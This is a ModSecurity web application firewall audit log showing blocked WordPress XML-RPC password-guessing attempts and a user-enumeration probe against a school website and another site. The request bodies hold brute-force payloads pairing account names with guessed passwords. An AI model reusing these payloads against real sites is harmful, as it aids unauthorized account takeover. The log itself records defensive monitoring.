"/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (86+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122151021886 4240 (- - -) Stopwatch2: 1749122151021886 4240; combined=3313, p1=361, p2=2788, p3=0, p4=0, p5=96, sr=78, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a971dd11-Z-- --e1d4aa08-A-- [05/Jun/2025:18:16:51 +0700] aEF8o3-K7ToMdu-YSIJW-QAAABg 103.236.140.4 57076 103.236.140.4 8181 --e1d4aa08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e1d4aa08-C-- wp.getUsersBlogs miswan 999 --e1d4aa08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1d4aa08-E-- --e1d4aa08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122211625317 5819 (- - -) Stopwatch2: 1749122211625317 5819; combined=3999, p1=518, p2=3290, p3=0, p4=0, p5=112, sr=86, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1d4aa08-Z-- --2218d87c-A-- [05/Jun/2025:18:17:08 +0700] aEF8tOth7G2xELALzPZcngAAANc 103.236.140.4 57118 103.236.140.4 8181 --2218d87c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.239.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.239.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2218d87c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2218d87c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749122228598394 3241 (- - -) Stopwatch2: 1749122228598394 3241; combined=1414, p1=490, p2=892, p3=0, p4=0, p5=32, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2218d87c-Z-- --b51bc868-A-- [05/Jun/2025:18:17:53 +0700] aEF84eth7G2xELALzPZcrwAAAMs 103.236.140.4 57182 103.236.140.4 8181 --b51bc868-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b51bc868-C-- wp.getUsersBlogs miswan zzzz --b51bc868-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b51bc868-E-- --b51bc868-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122273709031 4267 (- - -) Stopwatch2: 1749122273709031 4267; combined=3249, p1=372, p2=2709, p3=0, p4=0, p5=98, sr=95, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b51bc868-Z-- --a1c50c57-A-- [05/Jun/2025:18:18:54 +0700] aEF9Hn-K7ToMdu-YSIJXDgAAABE 103.236.140.4 57318 103.236.140.4 8181 --a1c50c57-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a1c50c57-C-- wp.getUsersBlogs miswan 123112233 --a1c50c57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1c50c57-E-- --a1c50c57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (52+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122334668724 34989 (- - -) Stopwatch2: 1749122334668724 34989; combined=61533, p1=554, p2=3567, p3=0, p4=0, p5=28723, sr=99, sw=82, l=0, gc=28607 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1c50c57-Z-- --fa2e1e36-A-- [05/Jun/2025:18:18:56 +0700] aEF9IH-K7ToMdu-YSIJXEQAAAAA 103.236.140.4 57326 103.236.140.4 8181 --fa2e1e36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --fa2e1e36-C-- wp.getUsersBlogs miswan 1234%^&* --fa2e1e36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa2e1e36-E-- --fa2e1e36-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122336783778 4946 (- - -) Stopwatch2: 1749122336783778 4946; combined=3643, p1=464, p2=2953, p3=0, p4=0, p5=137, sr=82, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa2e1e36-Z-- --c729e94c-A-- [05/Jun/2025:18:19:58 +0700] aEF9XirHpfaS2Cuwh8UJrQAAAFc 103.236.140.4 57500 103.236.140.4 8181 --c729e94c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --c729e94c-C-- wp.getUsersBlogs miswan monkey --c729e94c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c729e94c-E-- --c729e94c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (79+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122398074864 5161 (- - -) Stopwatch2: 1749122398074864 5161; combined=3700, p1=420, p2=3089, p3=0, p4=0, p5=110, sr=83, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c729e94c-Z-- --4d4d3064-A-- [05/Jun/2025:18:20:58 +0700] aEF9mirHpfaS2Cuwh8UJ0QAAAEU 103.236.140.4 57648 103.236.140.4 8181 --4d4d3064-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --4d4d3064-C-- wp.getUsersBlogs miswan familia --4d4d3064-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d4d3064-E-- --4d4d3064-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (62+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122458932219 5576 (- - -) Stopwatch2: 1749122458932219 5576; combined=3710, p1=492, p2=3037, p3=0, p4=0, p5=108, sr=87, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d4d3064-Z-- --de9d1323-A-- [05/Jun/2025:18:21:25 +0700] aEF9tSrHpfaS2Cuwh8UJ6QAAAEQ 103.236.140.4 57720 103.236.140.4 8181 --de9d1323-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --de9d1323-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadminlws --de9d1323-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de9d1323-E-- --de9d1323-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749122485113472 4407 (- - -) Stopwatch2: 1749122485113472 4407; combined=3407, p1=360, p2=2888, p3=0, p4=0, p5=94, sr=78, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de9d1323-Z-- --fa2e1e36-A-- [05/Jun/2025:18:21:58 +0700] aEF91irHpfaS2Cuwh8UJ9gAAAEw 103.236.140.4 57812 103.236.140.4 8181 --fa2e1e36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --fa2e1e36-C-- wp.getUsersBlogs miswan 20100728 --fa2e1e36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa2e1e36-E-- --fa2e1e36-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (64+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122518258857 4738 (- - -) Stopwatch2: 1749122518258857 4738; combined=3574, p1=419, p2=2924, p3=0, p4=0, p5=130, sr=87, sw=101, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa2e1e36-Z-- --105e1d12-A-- [05/Jun/2025:18:22:58 +0700] aEF-EirHpfaS2Cuwh8UKHQAAAEc 103.236.140.4 57944 103.236.140.4 8181 --105e1d12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --105e1d12-C-- wp.getUsersBlogs miswan peaches --105e1d12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --105e1d12-E-- --105e1d12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (54+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122578345743 4339 (- - -) Stopwatch2: 1749122578345743 4339; combined=3319, p1=356, p2=2782, p3=0, p4=0, p5=104, sr=80, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --105e1d12-Z-- --9d10417d-A-- [05/Jun/2025:18:23:10 +0700] aEF-Huth7G2xELALzPZdEwAAANc 103.236.140.4 57994 103.236.140.4 8181 --9d10417d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9d10417d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehTashi1234$ --9d10417d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d10417d-E-- --9d10417d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (3+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749122590286258 4773 (- - -) Stopwatch2: 1749122590286258 4773; combined=3597, p1=399, p2=3026, p3=0, p4=0, p5=101, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d10417d-Z-- --f869704f-A-- [05/Jun/2025:18:23:58 +0700] aEF-TirHpfaS2Cuwh8UKcgAAAEY 103.236.140.4 58144 103.236.140.4 8181 --f869704f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f869704f-C-- wp.getUsersBlogs miswan gerrard8 --f869704f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f869704f-E-- --f869704f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (89+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122638135895 4203 (- - -) Stopwatch2: 1749122638135895 4203; combined=3249, p1=390, p2=2696, p3=0, p4=0, p5=95, sr=82, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f869704f-Z-- --a8342c13-A-- [05/Jun/2025:18:24:58 +0700] aEF-iirHpfaS2Cuwh8UKkAAAAFY 103.236.140.4 58300 103.236.140.4 8181 --a8342c13-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a8342c13-C-- wp.getUsersBlogs kresno 1234567890 --a8342c13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8342c13-E-- --a8342c13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122698079997 4027 (- - -) Stopwatch2: 1749122698079997 4027; combined=3127, p1=343, p2=2630, p3=0, p4=0, p5=90, sr=74, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8342c13-Z-- --ce44b100-A-- [05/Jun/2025:18:26:13 +0700] aEF-1X-K7ToMdu-YSIJXSQAAABY 103.236.140.4 58482 103.236.140.4 8181 --ce44b100-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ce44b100-C-- wp.getUsersBlogs kresno kresno1997 --ce44b100-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce44b100-E-- --ce44b100-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122773895174 5214 (- - -) Stopwatch2: 1749122773895174 5214; combined=3742, p1=451, p2=3116, p3=0, p4=0, p5=103, sr=92, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce44b100-Z-- --6c8ca762-A-- [05/Jun/2025:18:27:19 +0700] aEF_F-th7G2xELALzPZdawAAANI 103.236.140.4 58574 103.236.140.4 8181 --6c8ca762-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --6c8ca762-C-- wp.getUsersBlogs kresno Marketing2013_ --6c8ca762-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c8ca762-E-- --6c8ca762-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (36+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122839977024 6017 (- - -) Stopwatch2: 1749122839977024 6017; combined=4209, p1=541, p2=3489, p3=0, p4=0, p5=107, sr=94, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
